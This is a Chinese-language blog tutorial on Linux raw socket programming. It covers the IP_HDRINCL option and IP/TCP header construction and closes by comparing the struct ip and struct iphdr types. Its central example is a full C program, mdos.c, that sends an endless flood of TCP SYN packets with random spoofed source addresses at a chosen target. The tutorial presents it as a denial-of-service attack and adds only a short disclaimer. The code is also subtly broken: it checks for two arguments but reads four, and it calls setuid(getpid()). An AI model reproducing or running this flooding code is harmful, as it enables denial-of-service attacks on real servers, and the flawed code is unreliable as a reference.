基于原始套接字编程

                                                              基于原始套接字编程

       在开发面向连接的TCP和面向无连接的UDP程序时,我们所关心的核心问题在于数据收发层面,数据的传输特性由TCP或UDP来保证:

基于原始套接字编程_第1张图片

       也就是说,对于TCP或UDP的程序开发,焦点在Data字段,我们没法直接对TCP或UDP头部字段进行赤裸裸的修改,当然还有IP头。换句话说,我们对它们头部操作的空间非常受限,只能使用它们已经开放给我们的诸如源、目的IP,源、目的端口等等。

       今天我们讨论一下原始套接字的程序开发,用它作为入门协议栈的进阶跳板太合适不过了。OK闲话不多说,进入正题。

       原始套接字的创建方法也不难:socket(AF_INET, SOCK_RAW, protocol)。

       重点在protocol字段,这里就不能简单的将其值为0了。在头文件netinet/in.h中定义了系统中该字段目前能取的值,注意:有些系统中不一定实现了netinet/in.h中的所有协议。源代码的linux/in.h中和netinet/in.h中的内容一样。

基于原始套接字编程_第2张图片

       我们常见的有IPPROTO_TCP,IPPROTO_UDP和IPPROTO_ICMP,在博文“(十六)洞悉linux下的Netfilter&iptables:开发自己的hook函数【实战】(下) ”中我们见到该protocol字段为IPPROTO_RAW时的情形,后面我们会详细介绍。

       用这种方式我就可以得到原始的IP包了,然后就可以自定义IP所承载的具体协议类型,如TCP,UDP或ICMP,并手动对每种承载在IP协议之上的报文进行填充。接下来我们看个最著名的例子DOS攻击的示例代码,以便大家更好的理解如何基于原始套接字手动去封装我们所需要TCP报文。

       先简单复习一下TCP报文的格式,因为我们本身不是讲协议的设计思想,所以只会提及和我们接下来主题相关的字段,如果想对TCP协议原理进行深入了解那么《TCP/IP详解卷1》无疑是最好的选择。

基于原始套接字编程_第3张图片

       我们目前主要关注上面着色部分的字段就OK了,接下来再看看TCP3次握手的过程。TCP的3次握手的一般流程是:

(1) 第一次握手:建立连接时,客户端A发送SYN包(SEQ_NUMBER=j)到服务器B,并进入SYN_SEND状态,等待服务器B确认。

(2) 第二次握手:服务器B收到SYN包,必须确认客户A的SYN(ACK_NUMBER=j+1),同时自己也发送一个SYN包(SEQ_NUMBER=k),即SYN+ACK包,此时服务器B进入SYN_RECV状态。

(3) 第三次握手:客户端A收到服务器B的SYN+ACK包,向服务器B发送确认包ACK(ACK_NUMBER=k+1),此包发送完毕,客户端A和服务器B进入ESTABLISHED状态,完成三次握手。

 至此3次握手结束,TCP通路就建立起来了,然后客户端与服务器开始交互数据。上面描述过程中,SYN包表示TCP数据包的标志位syn=1,同理,ACK表示TCP报文中标志位ack=1,SYN+ACK表示标志位syn=1和ack=1同时成立。

原始套接字还提供了一个非常有用的参数IP_HDRINCL:

1、当开启该参数时:我们可以从IP报文首部第一个字节开始依次构造整个IP报文的所有选项,但是IP报文头部中的标识字段(设置为0时)和IP首部校验和字段总是由内核自己维护的,不需要我们关心。

2、如果不开启该参数:我们所构造的报文是从IP首部之后的第一个字节开始,IP首部由内核自己维护,首部中的协议字段被设置成调用socket()函数时我们所传递给它的第三个参数。

 开启IP_HDRINCL特性的模板代码一般为:

       const int on =1;

  if (setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0){

printf("setsockopt error!\n");

  }

      所以,我们还得复习一下IP报文的首部格式:

基于原始套接字编程_第4张图片

 同样,我们重点关注IP首部中的着色部分区段的填充情况。

       有了上面的知识做铺垫,接下来DOS示例代码的编写就相当简单了。我们来体验一下手动构造原生态IP报文的乐趣吧:

点击(此处)折叠或打开

  1. //mdos.c
  2. #include <stdlib.h>
  3. #include <stdio.h>
  4. #include <errno.h>
  5. #include <string.h>
  6. #include <unistd.h>
  7. #include <netdb.h>
  8. #include <sys/socket.h>
  9. #include <sys/types.h>
  10. #include <netinet/in.h>
  11. #include <netinet/ip.h>
  12. #include <arpa/inet.h>
  13. #include <linux/tcp.h>
  14.  
  15. //我们自己写的攻击函数
  16. void attack(int skfd,struct sockaddr_in *target,unsigned short srcport);
  17. //如果什么都让内核做,那岂不是忒不爽了,咱也试着计算一下校验和。
  18. unsigned short check_sum(unsigned short *addr,int len);
  19.  
  20. int main(int argc,char** argv){
  21.         int skfd;
  22.         struct sockaddr_in target;
  23.         struct hostent *host;
  24.         const int on=1;
  25.         unsigned short srcport;
  26.  
  27.         if(argc!=2)
  28.         {
  29.                 printf("Usage:%s target dstport srcport\n",argv[0]);
  30.                 exit(1);
  31.         }
  32.  
  33.         bzero(&target,sizeof(struct sockaddr_in));
  34.         target.sin_family=AF_INET;
  35.         target.sin_port=htons(atoi(argv[2]));
  36.  
  37.         if(inet_aton(argv[1],&target.sin_addr)==0)
  38.         {
  39.                 host=gethostbyname(argv[1]);
  40.                 if(host==NULL)
  41.                 {
  42.                         printf("TargetName Error:%s\n",hstrerror(h_errno));
  43.                         exit(1);
  44.                 }
  45.                 target.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);
  46.         }
  47.  
  48.         //将协议字段置为IPPROTO_TCP,来创建一个TCP的原始套接字
  49.         if(0>(skfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP))){
  50.                 perror("Create Error");
  51.                 exit(1);
  52.         }
  53.  
  54.         //用模板代码来开启IP_HDRINCL特性,我们完全自己手动构造IP报文
  55.          if(0>setsockopt(skfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on))){
  56.                 perror("IP_HDRINCL failed");
  57.                 exit(1);
  58.         }
  59.  
  60.         //因为只有root用户才可以play with raw socket :)
  61.         setuid(getpid());
  62.         srcport = atoi(argv[3]);
  63.         attack(skfd,&target,srcport);
  64. }
  65.  
  66. //在该函数中构造整个IP报文,最后调用sendto函数将报文发送出去
  67. void attack(int skfd,struct sockaddr_in *target,unsigned short srcport){
  68.         char buf[128]={0};
  69.         struct ip *ip;
  70.         struct tcphdr *tcp;
  71.         int ip_len;
  72.  
  73.         //在我们TCP的报文中Data没有字段,所以整个IP报文的长度
  74.         ip_len = sizeof(struct ip)+sizeof(struct tcphdr);
  75.         //开始填充IP首部
  76.         ip=(struct ip*)buf;
  77.  
  78.         ip->ip_v = IPVERSION;
  79.         ip->ip_hl = sizeof(struct ip)>>2;
  80.         ip->ip_tos = 0;
  81.         ip->ip_len = htons(ip_len);
  82.         ip->ip_id=0;
  83.         ip->ip_off=0;
  84.         ip->ip_ttl=MAXTTL;
  85.         ip->ip_p=IPPROTO_TCP;
  86.         ip->ip_sum=0;
  87.         ip->ip_dst=target->sin_addr;
  88.  
  89.         //开始填充TCP首部
  90.         tcp = (struct tcphdr*)(buf+sizeof(struct ip));
  91.         tcp->source = htons(srcport);
  92.         tcp->dest = target->sin_port;
  93.         tcp->seq = random();
  94.         tcp->doff = 5;
  95.         tcp->syn = 1;
  96.         tcp->check = 0;
  97.  
  98.         while(1){
  99.                 //源地址伪造,我们随便任意生成个地址,让服务器一直等待下去
  100.                 ip->ip_src.s_addr = random();
  101.                 tcp->check=check_sum((unsigned short*)tcp,sizeof(struct tcphdr));
  102.                 sendto(skfd,buf,ip_len,0,(struct sockaddr*)target,sizeof(struct sockaddr_in));
  103.         }
  104. }
  105.  
  106. //关于CRC校验和的计算,网上一大堆,我就“拿来主义”了
  107. unsigned short check_sum(unsigned short *addr,int len){
  108.         register int nleft=len;
  109.         register int sum=0;
  110.         register short *w=addr;
  111.         short answer=0;
  112.  
  113.         while(nleft>1)
  114.         {
  115.                 sum+=*w++;
  116.                 nleft-=2;
  117.         }
  118.         if(nleft==1)
  119.         {
  120.                 *(unsigned char *)(&answer)=*(unsigned char *)w;
  121.                 sum+=answer;
  122.         }
  123.  
  124.         sum=(sum>>16)+(sum&0xffff);
  125.         sum+=(sum>>16);
  126.         answer=~sum;
  127.         return(answer);
  128. }
       用前面我们自己编写TCP服务器端程序来做本地测试,看看效果。先把服务器端程序启动起来,如下:

       然后,我们编写的“捣蛋”程序登场了:

       该“mdos”命令执行一段时间后,服务器端的输出如下:

基于原始套接字编程_第5张图片

       因为我们的源IP地址是随机生成的,源端口固定为8888,服务器端收到我们的SYN报文后,会为其分配一条连接资源,并将该连接的状态置为SYN_RECV,然后给客户端回送一个确认,并要求客户端再次确认,可我们却不再bird别个了,这样就会造成服务端一直等待直到超时。

       备注:本程序仅供交流分享使用,不要做恶,不然后果自负哦。

       最后补充一点,看到很多新手经常对struct ip{}和struct iphdr{},struct icmp{}和struct icmphdr{}纠结来纠结去了,不知道何时该用哪个。在/usr/include/netinet目录这些结构所属头文件的定义,头文件中对这些结构也做了很明确的说明,这里我们简单总结一下:

       struct ip{}、struct icmp{}是供BSD系统层使用,struct iphdr{}和struct icmphdr{}是在INET层调用。同理tcphdr和udphdr分别都已经和谐统一了,参见tcp.h和udp.h。

       BSD和INET的解释在协议栈篇章详细论述,这里大家可以简单这样来理解:我们在用户空间的编写网络应用程序的层次就叫做BSD层。所以我们该用什么样的数据结构呢?良好的编程习惯当然是BSD层推荐我们使用的,struct ip{}、struct icmp{}。至于INET层的两个同类型的结构体struct iphdr{}和struct icmphdr{}能用不?我只能说不建议。看个例子:

基于原始套接字编程_第6张图片

 我们可以看到无论BSD还是INET层的IP数据包结构体大小是相等的,ICMP报文的大小有差异。而我们知道ICMP报头应该是8字节,那么BSD层为什么是28字节呢?留给大家思考。也就是说,我们这个mdos.c的实例程序中除了用struct ip{}之外还可以用INET层的struct iphdr{}结构。将如下代码:

点击(此处)折叠或打开

  1. struct ip *ip;
  2. ip=(struct ip*)buf;
  3. ip->ip_v = IPVERSION;
  4. ip->ip_hl = sizeof(struct ip)>>2;
  5. ip->ip_tos = 0;
  6. ip->ip_len = htons(ip_len);
  7. ip->ip_id=0;
  8. ip->ip_off=0;
  9. ip->ip_ttl=MAXTTL;
  10. ip->ip_p=IPPROTO_TCP;
  11. ip->ip_sum=0;
  12. ip->ip_dst=target->sin_addr;
  13. ip->ip_src.s_addr = random();
改成:

点击(此处)折叠或打开

  1. struct iphdr *ip;
  2. ip=(struct iphdr*)buf;
  3. ip->version = IPVERSION;
  4. ip->ihl = sizeof(struct ip)>>2;
  5. ip->tos = 0;
  6. ip->tot_len = htons(ip_len);
  7. ip->id=0;
  8. ip->frag_off=0;
  9. ip->ttl=MAXTTL;
  10. ip->protocol=IPPROTO_TCP;
  11. ip->check=0;
  12. ip->daddr=target->sin_addr.s_addr;
  13. ip->saddr = random();

       结果请童鞋们自己验证。虽然结果一样,但在BSD层直接使用INET层的数据结构还是不被推荐的。

       小结:

       1、IP_HDRINCL选项可以使我们控制到底是要从IP头部第一个字节开始构造我们的原始报文或者从IP头部之后第一个数据字节开始。

       2、只有超级用户才能创建原始套接字。

       3、原始套接字上也可以调用connet、bind之类的函数,但都不常见。原因请大家回顾一下这两个函数的作用。想不起来的童鞋回头复习一下前两篇的内容吧。

 

你可能感兴趣的:(基于原始套接字编程)